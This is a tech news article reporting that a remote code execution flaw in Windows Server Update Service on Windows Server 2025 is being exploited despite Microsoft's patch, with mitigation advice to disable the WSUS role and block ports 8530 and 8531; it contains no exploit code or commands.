CATEGORIES
home News

Microsoft Windows Server Update Service Is Under Attack, What You Need To Know

by Chris HarperTuesday, October 28, 2025, 03:20 PM EDT
hero winserv25
Windows Server 2025 is currently open to a Remote Code Execution exploit via the Windows Update Service, and at the time of this writing a fix from Microsoft has yet to fully patch the issue. Reports to The Register indicate that Microsoft's attempt to patch the exploit earlier this month didn't stop any active exploitation, contrary to Microsoft's own page on the CVE reporting that the issue was not yet publicly disclosed or exploited. Microsoft only partially patching a vulnerability calls back to recent issues with SharePoint, though fortunately this exploit currently seems more limited in scale than that one was. Fortunately, it's a Remote Code Execution attack that seems limited to PowerShell rather than a full arbitrary Code Execution attack that would allow attackers to virtually do anything they want on a target system.

Analysts speaking to The Register note that one proof of concept has been available since October 21st. Current examples of the attack indicate that hackers are gaining access to a system and performing network reconnaissance by executing PowerShell commands to gain information about a given network and exfiltrate it to a Webhook.site endpoint. As Trend Micro's Dustin Childs warns, "If the patch doesn't fully address the vulnerability, the existence of a patch actually increases the risk to enterprises. It leads people to think they are protected when in fact they aren't. We need to start holding them accountable not only for patches that break functionality, but also for patches that don't fix the security issues they document." 

content winserv25rce

Microsoft's official documentation encourages potential victims to disable the WSUS Server Role on their servers and block inbound traffic to Ports 8530 and 8531, both of which should prevent the Windows Server Update Service from being exploited. However, that documentation also points toward the October 23rd out of band security update actually fixing the issue, which doesn't seem to be the case based on reports we're still seeing of the exploit being active at the time of writing. Hopefully, Microsoft fully patches out the exploit sooner rather than later—until then, we'd advise users disable the Windows Server Update Service entirely.

Image Credit: Microsoft, WikiMedia Commons (unofficial Windows Server 2025 logo)
Tags:  Microsoft, Windows Server, cybersecurity, (nasdaq:msft)
TOP STORIES
Which New GPU Is For You?
More Results
KEEP INFORMED

Stay updated with the latest news and updates. Subscribe to our newsletter!

Subscribe Now
SITE

Home

Reviews

News

Blogs

Full Site

Sitemap

CATEGORIES

PC Components

Systems

Mobile

IT Infrastructure

Leisure

Videos

COMPANY

About

Advertise

News Tips

Contact

Privacy And Terms

HotTech

MORE

Accessibility

Shop

STAY CONNECTED

Twitter

Facebook

YouTube

RSS

As an Amazon and Howl Technologies Associate, HotHardware earns a commission from qualifying purchases made on this site. This site is intended for informational and entertainment purposes only. The contents are the views and opinion of the author and/or his associates. All products and trademarks are the property of their respective owners. Reproduction in whole or in part, in any form or medium, without express written permission of Hot Hardware, Inc. is prohibited. All content and graphical elements are Copyright © 1999 - 2025 Hot Hardware Inc, Inc.
All rights reserved. Privacy and Terms - Accessibility Commitment